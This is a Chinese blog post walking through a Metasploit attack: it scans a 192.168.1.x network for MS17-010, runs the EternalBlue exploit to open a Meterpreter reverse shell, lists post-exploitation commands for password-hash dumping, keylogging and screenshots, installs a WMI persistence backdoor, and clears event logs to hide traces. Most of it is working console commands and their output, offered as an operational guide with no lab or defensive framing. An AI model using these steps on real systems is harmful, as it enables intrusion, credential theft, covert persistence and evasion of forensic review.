打赏

metasploit的常用模块,永恒之蓝,持久化 清理痕迹

永恒之蓝扫描模块 ,扫描局域网中有那些存在永恒之蓝漏洞

msf5 > search  eternalblue

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


msf5 > use  auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                               Required  Description
   ----         ---------------                                                               --------  -----------
   CHECK_ARCH   true                                                                          no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                                          no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                                         no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /home/testpoc/metasploit/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                                           yes       The SMB service port (TCP)
   SMBDomain    .                                                                             no        The Windows domain to use for authentication
   SMBPass                                                                                    no        The password for the specified username
   SMBUser                                                                                    no        The username to authenticate as
   THREADS      1                                                                             yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) >
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.*
RHOSTS => 192.168.1.*
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 10
THREADS => 10
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.168.1.2:445       - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.1.16:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.1.*:445       - Scanned  33 of 256 hosts (12% complete)
[-] 192.168.1.40:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.1.39:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.1.48:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.1.*:445       - Scanned  52 of 256 hosts (20% complete)
[*] 192.168.1.*:445       - Scanned  78 of 256 hosts (30% complete)
[+] 192.168.1.78:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 192.168.1.88:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.1.96:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[+] 192.168.1.95:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.1.100:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.1.*:445       - Scanned 106 of 256 hosts (41% complete)
[+] 192.168.1.109:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter 9600 x64 (64-bit)
[-] 192.168.1.126:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.1.124:445     - An SMB Login Error occurred while connecting to the IPC$ tree.
[+] 192.168.1.129:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.*:445       - Scanned 133 of 256 hosts (51% complete)

显示带有  Host is likely VULNERABLE   就是可能存在漏洞的机器

永恒之蓝利用

msf5 auxiliary(scanner/smb/smb_ms17_010) > use  exploit/windows/smb/ms17_010_eternalblue
s[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set  RHOSTS 192.168.1.78
RHOSTS => 192.168.1.78
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.1.78     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.137    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.1.137:4444
[*] 192.168.1.78:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.78:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.78:445      - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.78:445 - Connecting to target for exploitation.
[+] 192.168.1.78:445 - Connection established for exploitation.
[+] 192.168.1.78:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.78:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.78:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.78:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.78:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 192.168.1.78:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.78:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.78:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.78:445 - Starting non-paged pool grooming
[+] 192.168.1.78:445 - Sending SMBv2 buffers
[+] 192.168.1.78:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.78:445 - Sending final SMBv2 buffers.
[*] 192.168.1.78:445 - Sending last fragment of exploit packet!
[*] 192.168.1.78:445 - Receiving response from exploit packet
[+] 192.168.1.78:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.78:445 - Sending egg to corrupted connection.
[*] 192.168.1.78:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.78
[*] Meterpreter session 1 opened (192.168.1.137:4444 -> 192.168.1.78:49595) at 2021-02-03 07:32:10 +0000
By[+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.78:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
#成功获取到session

注意,如果payload 不是当前这个 建议使用 set payload windows/x64/meterpreter/reverse_tcp 改成当前这个

 

 

 

 

 

获取到session后的常用命令:

help #获取所有可用命令

getuid #获取当前权限

screenshot #截屏

hashdump #获取密码的hash

ps #获取进程列表

sysinfo #获取系统信息

 route #获取路由表

getpid #获取当前攻入的进程pid

migrate #将当前后门注入迁移到其他程序

keyscan_start # 开启键盘记录

keyscan_dump #显示键盘记录  使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe

download/upload #上传下载文件

keyscan_stop # 监视键盘记录

bg # 回到metasploit界面

 

 

 执行一些命令后 使用bg回到主界面 使用session 可以看到存在一个session ,可以使用 session 1再次进入

获取到权限后 接下来就是留下后门 可以使用 search persistence

msf5 exploit(windows/smb/ms17_010_eternalblue) > search persis

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss  2015-04-08       normal     No     Arris / Motorola Surfboard SBG6580 Web Interface Takeover
   1   auxiliary/scanner/http/lucky_punch                                           normal     No     HTTP Microsoft SQL Injection Table XSS Infection
   2   auxiliary/server/regsvr32_command_delivery_server                            normal     No     Regsvr32.exe (.sct) Command Delivery Server
   3   exploit/android/browser/webview_addjavascriptinterface      2012-12-21       excellent  No     Android Browser and WebView addJavascriptInterface Code Execution
   4   exploit/linux/http/ubiquiti_airos_file_upload               2016-02-13       excellent  No     Ubiquiti airOS Arbitrary File Upload
   5   exploit/linux/local/apt_package_manager_persistence         1999-03-09       excellent  No     APT Package Manager Persistence
   6   exploit/linux/local/autostart_persistence                   2006-02-13       excellent  No     Autostart Desktop Item Persistence
   7   exploit/linux/local/bash_profile_persistence                1989-06-08       normal     No     Bash Profile Persistence
   8   exploit/linux/local/cron_persistence                        1979-07-01       excellent  No     Cron Persistence
   9   exploit/linux/local/rc_local_persistence                    1980-10-01       excellent  No     rc.local Persistence
   10  exploit/linux/local/service_persistence                     1983-01-01       excellent  No     Service Persistence
   11  exploit/linux/local/yum_package_manager_persistence         2003-12-17       excellent  No     Yum Package Manager Persistence
   12  exploit/multi/misc/persistent_hpca_radexec_exec             2014-01-02       great      Yes    HP Client Automation Command Injection
   13  exploit/osx/local/persistence                               2012-04-01       excellent  No     Mac OS X Persistent Payload Installer
   14  exploit/osx/local/sudo_password_bypass                      2013-02-28       normal     Yes    Mac OS X Sudo Password Bypass
   15  exploit/unix/local/at_persistence                           1997-01-01       excellent  Yes    at(1) Persistence
   16  exploit/windows/browser/ms10_018_ie_behaviors               2010-03-09       good       No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   17  exploit/windows/local/persistence                           2011-10-19       excellent  No     Windows Persistent Registry Startup Payload Installer
   18  exploit/windows/local/persistence_image_exec_options        2008-06-28       excellent  No     Windows Silent Process Exit Persistence
   19  exploit/windows/local/persistence_service                   2018-10-20       excellent  No     Windows Persistent Service Installer
   20  exploit/windows/local/ps_persist                            2012-08-14       excellent  No     Powershell Payload Execution
   21  exploit/windows/local/ps_wmi_exec                           2012-08-19       excellent  No     Authenticated WMI Exec via Powershell
   22  exploit/windows/local/registry_persistence                  2015-07-01       excellent  Yes    Windows Registry Only Persistence
   23  exploit/windows/local/s4u_persistence                       2013-01-02       excellent  No     Windows Manage User Level Persistent Payload Installer
   24  exploit/windows/local/vss_persistence                       2011-10-21       excellent  No     Persistent Payload in Windows Volume Shadow Copy
   25  exploit/windows/local/wmi_persistence                       2017-06-06       normal     No     WMI Event Subscription Persistence
   26  exploit/windows/smb/psexec_psh                              1999-01-01       manual     No     Microsoft Windows Authenticated Powershell Command Execution
   27  payload/cmd/unix/bind_inetd                                                  normal     No     Unix Command Shell, Bind TCP (inetd)
   28  payload/cmd/windows/bind_perl                                                normal     No     Windows Command Shell, Bind TCP (via Perl)
   29  payload/cmd/windows/bind_perl_ipv6                                           normal     No     Windows Command Shell, Bind TCP (via perl) IPv6
   30  payload/php/bind_perl                                                        normal     No     PHP Command Shell, Bind TCP (via Perl)
   31  payload/php/bind_perl_ipv6                                                   normal     No     PHP Command Shell, Bind TCP (via perl) IPv6
   32  post/linux/manage/sshkey_persistence                                         excellent  No     SSH Key Persistence
   33  post/windows/gather/enum_ad_managedby_groups                                 normal     No     Windows Gather Active Directory Managed Groups
   34  post/windows/manage/install_ssh                                              normal     No     Install OpenSSH for Windows
   35  post/windows/manage/persistence_exe                                          normal     No     Windows Manage Persistent EXE Payload Installer
   36  post/windows/manage/portproxy                                                normal     No     Windows Manage Set Port Forwarding With PortProxy
   37  post/windows/manage/sshkey_persistence                                       good       No     SSH Key Persistence
   38  post/windows/manage/sticky_keys                                              normal     No     Sticky Keys Persistance Module

然后选一个顺眼的留下后门

注意  windows 下选择 exploit/windows/local 开头的 

 

如下

msf5 exploit(windows/local/ps_wmi_exec) > use exploit/windows/local/wmi_persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/wmi_persistence) > show options

Module options (exploit/windows/local/wmi_persistence):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   CALLBACK_INTERVAL   1800000          yes       Time between callbacks (In milliseconds). (Default: 1800000).
   CLASSNAME           UPDATER          yes       WMI event class name. (Default: UPDATER)
   EVENT_ID_TRIGGER    4625             yes       Event ID to trigger the payload. (Default: 4625)
   PERSISTENCE_METHOD  EVENT            yes       Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
   PROCESS_TRIGGER     CALC.EXE         yes       The process name to trigger the payload. (Default: CALC.EXE)
   SESSION                              yes       The session to run this module on.
   USERNAME_TRIGGER    BOB              yes       The username to trigger the payload. (Default: BOB)
   WAITFOR_TRIGGER     CALL             yes       The word to trigger the payload. (Default: CALL)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.137    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/wmi_persistence) > run

留下后门后 注意清理痕迹 

使用sessions  1 进入session 

使用clearev 清理痕迹

 

posted @ 2021-02-03 15:44  skycandy  阅读(2904)  评论(0编辑  收藏  举报